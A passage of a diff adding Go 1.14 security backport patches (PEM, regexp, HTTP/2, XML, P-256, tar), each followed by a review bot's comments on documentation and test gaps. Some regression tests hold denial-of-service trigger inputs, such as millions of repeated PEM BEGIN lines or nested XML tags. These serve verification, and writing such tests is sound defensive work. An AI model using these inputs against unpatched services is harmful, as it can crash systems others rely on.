+- } else if i := bytes.Index(data, pemStart); i >= 0 {
+- rest = rest[i+len(pemStart) : len(data)]
+- } else {
+- return nil, data
+- }
+-
+- typeLine, rest := getLine(rest)
+- if !bytes.HasSuffix(typeLine, pemEndOfLine) {
+- return decodeError(data, rest)
+- }
+- typeLine = typeLine[0 : len(typeLine)-len(pemEndOfLine)]
+-
+- p = &Block{
+- Headers: make(map[string]string),
+- Type: string(typeLine),
+- }
+-
+ for {
+- // This loop terminates because getLine's second result is
+- // always smaller than its argument.
+- if len(rest) == 0 {
++ if bytes.HasPrefix(rest, pemStart[1:]) {
++ rest = rest[len(pemStart)-1:]
++ } else if i := bytes.Index(rest, pemStart); i >= 0 {
++ rest = rest[i+len(pemStart) : len(rest)]
++ } else {
+ return nil, data
+ }
+- line, next := getLine(rest)
+
+- i := bytes.IndexByte(line, ':')
+- if i == -1 {
+- break
++ var typeLine []byte
++ typeLine, rest = getLine(rest)
++ if !bytes.HasSuffix(typeLine, pemEndOfLine) {
++ continue
+ }
++ typeLine = typeLine[0 : len(typeLine)-len(pemEndOfLine)]
+
+- // TODO(agl): need to cope with values that spread across lines.
+- key, val := line[:i], line[i+1:]
+- key = bytes.TrimSpace(key)
+- val = bytes.TrimSpace(val)
+- p.Headers[string(key)] = string(val)
+- rest = next
+- }
++ p = &Block{
++ Headers: make(map[string]string),
++ Type: string(typeLine),
++ }
+
+- var endIndex, endTrailerIndex int
++ for {
++ // This loop terminates because getLine's second result is
++ // always smaller than its argument.
++ if len(rest) == 0 {
++ return nil, data
++ }
++ line, next := getLine(rest)
+
+- // If there were no headers, the END line might occur
+- // immediately, without a leading newline.
+- if len(p.Headers) == 0 && bytes.HasPrefix(rest, pemEnd[1:]) {
+- endIndex = 0
+- endTrailerIndex = len(pemEnd) - 1
+- } else {
+- endIndex = bytes.Index(rest, pemEnd)
+- endTrailerIndex = endIndex + len(pemEnd)
+- }
++ i := bytes.IndexByte(line, ':')
++ if i == -1 {
++ break
++ }
+
+- if endIndex < 0 {
+- return decodeError(data, rest)
+- }
++ // TODO(agl): need to cope with values that spread across lines.
++ key, val := line[:i], line[i+1:]
++ key = bytes.TrimSpace(key)
++ val = bytes.TrimSpace(val)
++ p.Headers[string(key)] = string(val)
++ rest = next
++ }
+
+- // After the "-----" of the ending line, there should be the same type
+- // and then a final five dashes.
+- endTrailer := rest[endTrailerIndex:]
+- endTrailerLen := len(typeLine) + len(pemEndOfLine)
+- if len(endTrailer) < endTrailerLen {
+- return decodeError(data, rest)
+- }
++ var endIndex, endTrailerIndex int
+
+- restOfEndLine := endTrailer[endTrailerLen:]
+- endTrailer = endTrailer[:endTrailerLen]
+- if !bytes.HasPrefix(endTrailer, typeLine) ||
+- !bytes.HasSuffix(endTrailer, pemEndOfLine) {
+- return decodeError(data, rest)
+- }
++ // If there were no headers, the END line might occur
++ // immediately, without a leading newline.
++ if len(p.Headers) == 0 && bytes.HasPrefix(rest, pemEnd[1:]) {
++ endIndex = 0
++ endTrailerIndex = len(pemEnd) - 1
++ } else {
++ endIndex = bytes.Index(rest, pemEnd)
++ endTrailerIndex = endIndex + len(pemEnd)
++ }
+
+- // The line must end with only whitespace.
+- if s, _ := getLine(restOfEndLine); len(s) != 0 {
+- return decodeError(data, rest)
+- }
++ if endIndex < 0 {
++ continue
++ }
+
+- base64Data := removeSpacesAndTabs(rest[:endIndex])
+- p.Bytes = make([]byte, base64.StdEncoding.DecodedLen(len(base64Data)))
+- n, err := base64.StdEncoding.Decode(p.Bytes, base64Data)
+- if err != nil {
+- return decodeError(data, rest)
+- }
+- p.Bytes = p.Bytes[:n]
++ // After the "-----" of the ending line, there should be the same type
++ // and then a final five dashes.
++ endTrailer := rest[endTrailerIndex:]
++ endTrailerLen := len(typeLine) + len(pemEndOfLine)
++ if len(endTrailer) < endTrailerLen {
++ continue
++ }
++
++ restOfEndLine := endTrailer[endTrailerLen:]
++ endTrailer = endTrailer[:endTrailerLen]
++ if !bytes.HasPrefix(endTrailer, typeLine) ||
++ !bytes.HasSuffix(endTrailer, pemEndOfLine) {
++ continue
++ }
+
+- // the -1 is because we might have only matched pemEnd without the
+- // leading newline if the PEM block was empty.
+- _, rest = getLine(rest[endIndex+len(pemEnd)-1:])
++ // The line must end with only whitespace.
++ if s, _ := getLine(restOfEndLine); len(s) != 0 {
++ continue
++ }
+
+- return
+-}
++ base64Data := removeSpacesAndTabs(rest[:endIndex])
++ p.Bytes = make([]byte, base64.StdEncoding.DecodedLen(len(base64Data)))
++ n, err := base64.StdEncoding.Decode(p.Bytes, base64Data)
++ if err != nil {
++ continue
++ }
++ p.Bytes = p.Bytes[:n]
+
+-func decodeError(data, rest []byte) (*Block, []byte) {
+- // If we get here then we have rejected a likely looking, but
+- // ultimately invalid PEM block. We need to start over from a new
+- // position. We have consumed the preamble line and will have consumed
+- // any lines which could be header lines. However, a valid preamble
+- // line is not a valid header line, therefore we cannot have consumed
+- // the preamble line for the any subsequent block. Thus, we will always
+- // find any valid block, no matter what bytes precede it.
+- //
+- // For example, if the input is
+- //
+- // -----BEGIN MALFORMED BLOCK-----
+- // junk that may look like header lines
+- // or data lines, but no END line
+- //
+- // -----BEGIN ACTUAL BLOCK-----
+- // realdata
+- // -----END ACTUAL BLOCK-----
+- //
+- // we've failed to parse using the first BEGIN line
+- // and now will try again, using the second BEGIN line.
+- p, rest := Decode(rest)
+- if p == nil {
+- rest = data
++ // the -1 is because we might have only matched pemEnd without the
++ // leading newline if the PEM block was empty.
++ _, rest = getLine(rest[endIndex+len(pemEnd)-1:])
++ return p, rest
+ }
+- return p, rest
+ }
+
+ const pemLineLength = 64
+diff --git a/src/encoding/pem/pem_test.go b/src/encoding/pem/pem_test.go
+index 8515b46..4485581 100644
+--- a/src/encoding/pem/pem_test.go
++++ b/src/encoding/pem/pem_test.go
+@@ -107,6 +107,12 @@ const pemMissingEndingSpace = `
+ dGVzdA==
+ -----ENDBAR-----`
+
++const pemMissingEndLine = `
++-----BEGIN FOO-----
++Header: 1`
++
++var pemRepeatingBegin = strings.Repeat("-----BEGIN \n", 10)
++
+ var badPEMTests = []struct {
+ name string
+ input string
+@@ -131,14 +137,34 @@ var badPEMTests = []struct {
+ "missing ending space",
+ pemMissingEndingSpace,
+ },
++ {
++ "repeating begin",
++ pemRepeatingBegin,
++ },
++ {
++ "missing end line",
++ pemMissingEndLine,
++ },
+ }
+
+ func TestBadDecode(t *testing.T) {
+ for _, test := range badPEMTests {
+- result, _ := Decode([]byte(test.input))
++ result, rest := Decode([]byte(test.input))
+ if result != nil {
+ t.Errorf("unexpected success while parsing %q", test.name)
+ }
++ if string(rest) != test.input {
++ t.Errorf("unexpected rest: %q; want = %q", rest, test.input)
++ }
++ }
++}
++
++func TestCVE202224675(t *testing.T) {
++ // Prior to CVE-2022-24675, this input would cause a stack overflow.
++ input := []byte(strings.Repeat("-----BEGIN \n", 10000000))
++ result, rest := Decode(input)
++ if result != nil || !reflect.DeepEqual(rest, input) {
++ t.Errorf("Encode of %#v decoded as %#v", input, rest)
+ }
+ }
+
+--
+2.25.1
+
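Review bot: The rewritten `Decode` loop in pem.go replaces every `decodeError` call with a bare `continue`, and the explanation that lived in `decodeError` (why rescanning from `rest` still finds any valid later block) is deleted without a replacement. A short comment on the outer `for` would keep that reasoning, e.g. `// Each continue drops the current candidate and rescans rest for the next BEGIN line; rest shrinks on every pass, so the loop terminates.` It is also worth stating there that every failure path returns the original `data` as the remainder, which the updated `TestBadDecode` now asserts. In `TestCVE202224675` the failure message says "Encode" and formats the roughly 120 MB input with `%#v`; reporting `len(rest)` and `len(input)` instead would keep a failing log readable.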
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch
new file mode 100644
index 0000000000..e4270d8a75
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch
@@ -0,0 +1,198 @@
+From ba99f699d26483ea1045f47c760e9be30799e311 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Wed, 2 Feb 2022 16:41:32 -0500
+Subject: [PATCH] regexp/syntax: reject very deeply nested regexps in Parse
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/2b65cde5868d8245ef8a0b8eba1e361440252d3b]
+CVE: CVE-2022-24921
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org
+
+
+The regexp code assumes it can recurse over the structure of
+a regexp safely. Go's growable stacks make that reasonable
+for all plausible regexps, but implausible ones can reach the
+“infinite recursion?†stack limit.
+
+This CL limits the depth of any parsed regexp to 1000.
+That is, the depth of the parse tree is required to be ≤ 1000.
+Regexps that require deeper parse trees will return ErrInternalError.
+A future CL will change the error to ErrInvalidDepth,
+but using ErrInternalError for now avoids introducing new API
+in point releases when this is backported.
+
+Fixes #51112.
+Fixes #51117.
+
+Change-Id: I97d2cd82195946eb43a4ea8561f5b95f91fb14c5
+Reviewed-on: https://go-review.googlesource.com/c/go/+/384616
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+Reviewed-by: Ian Lance Taylor <iant@golang.org>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/384855
+---
+ src/regexp/syntax/parse.go | 72 ++++++++++++++++++++++++++++++++-
+ src/regexp/syntax/parse_test.go | 7 ++++
+ 2 files changed, 77 insertions(+), 2 deletions(-)
+
+diff --git a/src/regexp/syntax/parse.go b/src/regexp/syntax/parse.go
+index 8c6d43a..55bd20d 100644
+--- a/src/regexp/syntax/parse.go
++++ b/src/regexp/syntax/parse.go
+@@ -76,13 +76,29 @@ const (
+ opVerticalBar
+ )
+
++// maxHeight is the maximum height of a regexp parse tree.
++// It is somewhat arbitrarily chosen, but the idea is to be large enough
++// that no one will actually hit in real use but at the same time small enough
++// that recursion on the Regexp tree will not hit the 1GB Go stack limit.
++// The maximum amount of stack for a single recursive frame is probably
++// closer to 1kB, so this could potentially be raised, but it seems unlikely
++// that people have regexps nested even this deeply.
++// We ran a test on Google's C++ code base and turned up only
++// a single use case with depth > 100; it had depth 128.
++// Using depth 1000 should be plenty of margin.
++// As an optimization, we don't even bother calculating heights
++// until we've allocated at least maxHeight Regexp structures.
++const maxHeight = 1000
++
+ type parser struct {
+ flags Flags // parse mode flags
+ stack []*Regexp // stack of parsed expressions
+ free *Regexp
+ numCap int // number of capturing groups seen
+ wholeRegexp string
+- tmpClass []rune // temporary char class work space
++ tmpClass []rune // temporary char class work space
++ numRegexp int // number of regexps allocated
++ height map[*Regexp]int // regexp height for height limit check
+ }
+
+ func (p *parser) newRegexp(op Op) *Regexp {
+@@ -92,16 +108,52 @@ func (p *parser) newRegexp(op Op) *Regexp {
+ *re = Regexp{}
+ } else {
+ re = new(Regexp)
++ p.numRegexp++
+ }
+ re.Op = op
+ return re
+ }
+
+ func (p *parser) reuse(re *Regexp) {
++ if p.height != nil {
++ delete(p.height, re)
++ }
+ re.Sub0[0] = p.free
+ p.free = re
+ }
+
++func (p *parser) checkHeight(re *Regexp) {
++ if p.numRegexp < maxHeight {
++ return
++ }
++ if p.height == nil {
++ p.height = make(map[*Regexp]int)
++ for _, re := range p.stack {
++ p.checkHeight(re)
++ }
++ }
++ if p.calcHeight(re, true) > maxHeight {
++ panic(ErrInternalError)
++ }
++}
++
++func (p *parser) calcHeight(re *Regexp, force bool) int {
++ if !force {
++ if h, ok := p.height[re]; ok {
++ return h
++ }
++ }
++ h := 1
++ for _, sub := range re.Sub {
++ hsub := p.calcHeight(sub, false)
++ if h < 1+hsub {
++ h = 1 + hsub
++ }
++ }
++ p.height[re] = h
++ return h
++}
++
+ // Parse stack manipulation.
+
+ // push pushes the regexp re onto the parse stack and returns the regexp.
+@@ -137,6 +189,7 @@ func (p *parser) push(re *Regexp) *Regexp {
+ }
+
+ p.stack = append(p.stack, re)
++ p.checkHeight(re)
+ return re
+ }
+
+@@ -252,6 +305,7 @@ func (p *parser) repeat(op Op, min, max int, before, after, lastRepeat string) (
+ re.Sub = re.Sub0[:1]
+ re.Sub[0] = sub
+ p.stack[n-1] = re
++ p.checkHeight(re)
+
+ if op == OpRepeat && (min >= 2 || max >= 2) && !repeatIsValid(re, 1000) {
+ return "", &Error{ErrInvalidRepeatSize, before[:len(before)-len(after)]}
+@@ -699,6 +753,21 @@ func literalRegexp(s string, flags Flags) *Regexp {
+ // Flags, and returns a regular expression parse tree. The syntax is
+ // described in the top-level comment.
+ func Parse(s string, flags Flags) (*Regexp, error) {
++ return parse(s, flags)
++}
++
++func parse(s string, flags Flags) (_ *Regexp, err error) {
++ defer func() {
++ switch r := recover(); r {
++ default:
++ panic(r)
++ case nil:
++ // ok
++ case ErrInternalError:
++ err = &Error{Code: ErrInternalError, Expr: s}
++ }
++ }()
++
+ if flags&Literal != 0 {
+ // Trivial parser for literal string.
+ if err := checkUTF8(s); err != nil {
+@@ -710,7 +779,6 @@ func Parse(s string, flags Flags) (*Regexp, error) {
+ // Otherwise, must do real work.
+ var (
+ p parser
+- err error
+ c rune
+ op Op
+ lastRepeat string
+diff --git a/src/regexp/syntax/parse_test.go b/src/regexp/syntax/parse_test.go
+index 5581ba1..1ef6d8a 100644
+--- a/src/regexp/syntax/parse_test.go
++++ b/src/regexp/syntax/parse_test.go
+@@ -207,6 +207,11 @@ var parseTests = []parseTest{
+ // Valid repetitions.
+ {`((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}))`, ``},
+ {`((((((((((x{1}){2}){2}){2}){2}){2}){2}){2}){2}){2})`, ``},
++
++ // Valid nesting.
++ {strings.Repeat("(", 999) + strings.Repeat(")", 999), ``},
++ {strings.Repeat("(?:", 999) + strings.Repeat(")*", 999), ``},
++ {"(" + strings.Repeat("|", 12345) + ")", ``}, // not nested at all
+ }
+
+ const testFlags = MatchNL | PerlX | UnicodeGroups
+@@ -482,6 +487,8 @@ var invalidRegexps = []string{
+ `a{100000}`,
+ `a{100000,}`,
+ "((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}){2})",
++ strings.Repeat("(", 1000) + strings.Repeat(")", 1000),
++ strings.Repeat("(?:", 1000) + strings.Repeat(")*", 1000),
+ `\Q\E*`,
+ }
+
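Review bot: `checkHeight` and `calcHeight` in parse.go are added without doc comments, and the `force` argument of `calcHeight` is not explained anywhere. Suggested: `// checkHeight panics with ErrInternalError if re is taller than maxHeight; it does nothing until maxHeight Regexps have been allocated.` and `// calcHeight returns the height of re, reusing the cached value in p.height unless force is set.` A comment on the deferred `recover` in `parse`, saying that only `ErrInternalError` is converted into a returned error and any other panic is re-raised, would help as well. Separately, the `Signed-off-by:` line in the patch header is missing its closing `>`.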
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch
new file mode 100644
index 0000000000..238c3eac5b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch
@@ -0,0 +1,68 @@
+From 48c9076dcfc2dc894842ff758c8cfae7957c9565 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 29 Sep 2022 17:06:18 +0530
+Subject: [PATCH] CVE-2022-27664
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479]
+CVE: CVE-2022-27664
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/net/http/h2_bundle.go | 21 +++++++++++++--------
+ 1 file changed, 13 insertions(+), 8 deletions(-)
+
+diff --git a/src/net/http/h2_bundle.go b/src/net/http/h2_bundle.go
+index 65d851d..83f2a72 100644
+--- a/src/net/http/h2_bundle.go
++++ b/src/net/http/h2_bundle.go
+@@ -3254,10 +3254,11 @@ var (
+ // name (key). See httpguts.ValidHeaderName for the base rules.
+ //
+ // Further, http2 says:
+-// "Just as in HTTP/1.x, header field names are strings of ASCII
+-// characters that are compared in a case-insensitive
+-// fashion. However, header field names MUST be converted to
+-// lowercase prior to their encoding in HTTP/2. "
++//
++// "Just as in HTTP/1.x, header field names are strings of ASCII
++// characters that are compared in a case-insensitive
++// fashion. However, header field names MUST be converted to
++// lowercase prior to their encoding in HTTP/2. "
+ func http2validWireHeaderFieldName(v string) bool {
+ if len(v) == 0 {
+ return false
+@@ -3446,8 +3447,8 @@ func (s *http2sorter) SortStrings(ss []string) {
+ // validPseudoPath reports whether v is a valid :path pseudo-header
+ // value. It must be either:
+ //
+-// *) a non-empty string starting with '/'
+-// *) the string '*', for OPTIONS requests.
++// *) a non-empty string starting with '/'
++// *) the string '*', for OPTIONS requests.
+ //
+ // For now this is only used a quick check for deciding when to clean
+ // up Opaque URLs before sending requests from the Transport.
+@@ -4897,6 +4898,9 @@ func (sc *http2serverConn) startGracefulShutdownInternal() {
+ func (sc *http2serverConn) goAway(code http2ErrCode) {
+ sc.serveG.check()
+ if sc.inGoAway {
++ if sc.goAwayCode == http2ErrCodeNo {
++ sc.goAwayCode = code
++ }
+ return
+ }
+ sc.inGoAway = true
+@@ -6091,8 +6095,9 @@ func (rws *http2responseWriterState) writeChunk(p []byte) (n int, err error) {
+ // prior to the headers being written. If the set of trailers is fixed
+ // or known before the header is written, the normal Go trailers mechanism
+ // is preferred:
+-// https://golang.org/pkg/net/http/#ResponseWriter
+-// https://golang.org/pkg/net/http/#example_ResponseWriter_trailers
++//
++// https://golang.org/pkg/net/http/#ResponseWriter
++// https://golang.org/pkg/net/http/#example_ResponseWriter_trailers
+ const http2TrailerPrefix = "Trailer:"
+
+ // promoteUndeclaredTrailers permits http.Handlers to set trailers
+--
+2.25.1
+
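Review bot: Three of the four inner hunks for h2_bundle.go (at 3254, 3447 and 6091) only re-indent doc comments and are unrelated to the fix; the security change is the three lines added to `http2serverConn.goAway`. Carrying the reformatting in a CVE backport makes the patch harder to audit and more likely to conflict with other patches to the same bundled file, so I would drop those hunks and keep only the `goAway` one. The `goAway` change would also benefit from a comment such as `// Already going away: replace a no-error code with the real error code.`; how `goAwayCode` is consumed lies outside the hunk, so the exact effect is inferred.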
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch
new file mode 100644
index 0000000000..8afa292144
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch
@@ -0,0 +1,104 @@
+From 8136eb2e5c316a51d0da710fbd0504cbbefee526 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Mon, 28 Mar 2022 18:41:26 -0700
+Subject: [PATCH] encoding/xml: use iterative Skip, rather than recursive
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/58facfbe7db2fbb9afed794b281a70bdb12a60ae]
+CVE: CVE-2022-28131
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+Prevents exhausting the stack limit in _incredibly_ deeply nested
+structures.
+
+Fixes #53711
+Updates #53614
+Fixes CVE-2022-28131
+
+Change-Id: I47db4595ce10cecc29fbd06afce7b299868599e6
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1419912
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit 9278cb78443d2b4deb24cbb5b61c9ba5ac688d49)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/417068
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Heschi Kreinick <heschi@google.com>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+---
+ src/encoding/xml/read.go | 15 ++++++++-------
+ src/encoding/xml/read_test.go | 18 ++++++++++++++++++
+ 2 files changed, 26 insertions(+), 7 deletions(-)
+
+diff --git a/src/encoding/xml/read.go b/src/encoding/xml/read.go
+index 4ffed80..3fac859 100644
+--- a/src/encoding/xml/read.go
++++ b/src/encoding/xml/read.go
+@@ -743,12 +743,12 @@ Loop:
+ }
+
+ // Skip reads tokens until it has consumed the end element
+-// matching the most recent start element already consumed.
+-// It recurs if it encounters a start element, so it can be used to
+-// skip nested structures.
++// matching the most recent start element already consumed,
++// skipping nested structures.
+ // It returns nil if it finds an end element matching the start
+ // element; otherwise it returns an error describing the problem.
+ func (d *Decoder) Skip() error {
++ var depth int64
+ for {
+ tok, err := d.Token()
+ if err != nil {
+@@ -756,11 +756,12 @@ func (d *Decoder) Skip() error {
+ }
+ switch tok.(type) {
+ case StartElement:
+- if err := d.Skip(); err != nil {
+- return err
+- }
++ depth++
+ case EndElement:
+- return nil
++ if depth == 0 {
++ return nil
++ }
++ depth--
+ }
+ }
+ }
+diff --git a/src/encoding/xml/read_test.go b/src/encoding/xml/read_test.go
+index 6a20b1a..7a621a5 100644
+--- a/src/encoding/xml/read_test.go
++++ b/src/encoding/xml/read_test.go
+@@ -5,9 +5,11 @@
+ package xml
+
+ import (
++ "bytes"
+ "errors"
+ "io"
+ "reflect"
++ "runtime"
+ "strings"
+ "testing"
+ "time"
+@@ -1093,3 +1095,19 @@ func TestCVE202228131(t *testing.T) {
+ t.Fatalf("Unmarshal unexpected error: got %q, want %q", err, errExeceededMaxUnmarshalDepth)
+ }
+ }
++
++func TestCVE202230633(t *testing.T) {
++ if runtime.GOARCH == "wasm" {
++ t.Skip("causes memory exhaustion on js/wasm")
++ }
++ defer func() {
++ p := recover()
++ if p != nil {
++ t.Fatal("Unmarshal panicked")
++ }
++ }()
++ var example struct {
++ Things []string
++ }
++ Unmarshal(bytes.Repeat([]byte("<a>"), 17_000_000), &example)
++}
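Review bot: The test added to read_test.go is named `TestCVE202230633`, but this patch is filed as CVE-2022-28131, and the hunk context shows a `TestCVE202228131` already present that checks `errExeceededMaxUnmarshalDepth`. The read_test.go hunk therefore only applies after whichever patch introduced that earlier test, an ordering the recipe's patch list (not visible here) has to respect. I would add a comment on the new test, e.g. `// Regression test for the iterative Decoder.Skip change (CVE-2022-28131).`, assuming it reaches `Skip` through `Unmarshal`, so the name is not taken for a mix-up. The `Skip` doc comment could also say that `depth` counts start elements seen since the call that are still unmatched.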
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch
new file mode 100644
index 0000000000..6361deec7d
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch
@@ -0,0 +1,36 @@
+From 34d9ab78568d63d8097911237897b188bdaba9c2 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Thu, 31 Mar 2022 12:31:58 -0400
+Subject: [PATCH] crypto/elliptic: tolerate zero-padded scalars in generic
+ P-256
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/7139e8b024604ab168b51b99c6e8168257a5bf58]
+CVE: CVE-2022-28327
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+Updates #52075
+Fixes #52076
+Fixes CVE-2022-28327
+
+Change-Id: I595a7514c9a0aa1b9c76aedfc2307e1124271f27
+Reviewed-on: https://go-review.googlesource.com/c/go/+/397136
+Trust: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Julie Qiu <julie@golang.org>
+---
+ src/crypto/elliptic/p256.go | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/crypto/elliptic/p256.go b/src/crypto/elliptic/p256.go
+index c23e414..787e3e7 100644
+--- a/src/crypto/elliptic/p256.go
++++ b/src/crypto/elliptic/p256.go
+@@ -51,7 +51,7 @@ func p256GetScalar(out *[32]byte, in []byte) {
+ n := new(big.Int).SetBytes(in)
+ var scalarBytes []byte
+
+- if n.Cmp(p256Params.N) >= 0 {
++ if n.Cmp(p256Params.N) >= 0 || len(in) > len(out) {
+ n.Mod(n, p256Params.N)
+ scalarBytes = n.Bytes()
+ } else {
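Review bot: The added `len(in) > len(out)` condition in `p256GetScalar` has no comment and the patch adds no test, so the reason for forcing the `Mod` path on over-long input is only recoverable from the subject line. I would add `// Also reduce when in is longer than out (e.g. a zero-padded scalar), so scalarBytes fits in out.` above the `if`. The `else` branch and the copy into `out` are outside the hunk, so the exact failure without the check is inferred rather than visible. A test that passes a scalar with leading zero bytes through the P-256 scalar multiplication would pin the fix.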
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch
new file mode 100644
index 0000000000..ea04a82d16
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch
@@ -0,0 +1,111 @@
+From 9d339f1d0f53c4116a7cb4acfa895f31a07212ee Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Fri, 2 Sep 2022 20:45:18 -0700
+Subject: [PATCH] archive/tar: limit size of headers
+
+Set a 1MiB limit on special file blocks (PAX headers, GNU long names,
+GNU link names), to avoid reading arbitrarily large amounts of data
+into memory.
+
+Thanks to Adam Korczynski (ADA Logics) and OSS-Fuzz for reporting
+this issue.
+
+Fixes CVE-2022-2879
+Updates #54853
+Fixes #55926
+
+Change-Id: I85136d6ff1e0af101a112190e027987ab4335680
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1565555
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+(cherry picked from commit 6ee768cef6b82adf7a90dcf367a1699ef694f3b2)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1591053
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/438498
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/0a723816cd2]
+CVE: CVE-2022-2879
+Signed-off-by: Sunil Kumar <sukumar@mvista.com>
+---
+ src/archive/tar/format.go | 4 ++++
+ src/archive/tar/reader.go | 14 ++++++++++++--
+ src/archive/tar/writer.go | 3 +++
+ 3 files changed, 19 insertions(+), 2 deletions(-)
+
+diff --git a/src/archive/tar/format.go b/src/archive/tar/format.go
+index cfe24a5..6642364 100644
+--- a/src/archive/tar/format.go
++++ b/src/archive/tar/format.go
+@@ -143,6 +143,10 @@ const (
+ blockSize = 512 // Size of each block in a tar stream
+ nameSize = 100 // Max length of the name field in USTAR format
+ prefixSize = 155 // Max length of the prefix field in USTAR format
++
++ // Max length of a special file (PAX header, GNU long name or link).
++ // This matches the limit used by libarchive.
++ maxSpecialFileSize = 1 << 20
+ )
+
+ // blockPadding computes the number of bytes needed to pad offset up to the
+diff --git a/src/archive/tar/reader.go b/src/archive/tar/reader.go
+index 4f9135b..e996595 100644
+--- a/src/archive/tar/reader.go
++++ b/src/archive/tar/reader.go
+@@ -104,7 +104,7 @@ func (tr *Reader) next() (*Header, error) {
+ continue // This is a meta header affecting the next header
+ case TypeGNULongName, TypeGNULongLink:
+ format.mayOnlyBe(FormatGNU)
+- realname, err := ioutil.ReadAll(tr)
++ realname, err := readSpecialFile(tr)
+ if err != nil {
+ return nil, err
+ }
+@@ -294,7 +294,7 @@ func mergePAX(hdr *Header, paxHdrs map[string]string) (err error) {
+ // parsePAX parses PAX headers.
+ // If an extended header (type 'x') is invalid, ErrHeader is returned
+ func parsePAX(r io.Reader) (map[string]string, error) {
+- buf, err := ioutil.ReadAll(r)
++ buf, err := readSpecialFile(r)
+ if err != nil {
+ return nil, err
+ }
+@@ -827,6 +827,16 @@ func tryReadFull(r io.Reader, b []byte) (n int, err error) {
+ return n, err
+ }
+
++// readSpecialFile is like ioutil.ReadAll except it returns
++// ErrFieldTooLong if more than maxSpecialFileSize is read.
++func readSpecialFile(r io.Reader) ([]byte, error) {
++ buf, err := ioutil.ReadAll(io.LimitReader(r, maxSpecialFileSize+1))
++ if len(buf) > maxSpecialFileSize {
++ return nil, ErrFieldTooLong
++ }
++ return buf, err
++}
++
+ // discard skips n bytes in r, reporting an error if unable to do so.
+ func discard(r io.Reader, n int64) error {
+ // If possible, Seek to the last byte before the end of the data section.
+diff --git a/src/archive/tar/writer.go b/src/archive/tar/writer.go
+index e80498d..893eac0 100644
+--- a/src/archive/tar/writer.go
++++ b/src/archive/tar/writer.go
+@@ -199,6 +199,9 @@ func (tw *Writer) writePAXHeader(hdr *Header, paxHdrs map[string]string) error {
+ flag = TypeXHeader
+ }
+ data := buf.String()
++ if len(data) > maxSpecialFileSize {
++ return ErrFieldTooLong
++ }
+ if err := tw.writeRawFile(name, data, flag, FormatPAX); err != nil || isGlobal {
+ return err // Global headers return here
+ }
+--
+2.7.4
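Review bot: No test accompanies the new 1 MiB limit: the diffstat lists only format.go, reader.go and writer.go, so nothing in the backport exercises `readSpecialFile` or the `writePAXHeader` check. A reader test that presents a PAX or GNU long-name entry just over `maxSpecialFileSize` and expects `ErrFieldTooLong`, plus one at exactly the limit that still succeeds, would guard the `+1` in `io.LimitReader(r, maxSpecialFileSize+1)` against off-by-one regressions. `readSpecialFile` also returns `ErrFieldTooLong` in preference to any read error when both occur; a sentence in its comment would make that intentional.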
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch
new file mode 100644
index 0000000000..8376dc45ba
--- /dev/null
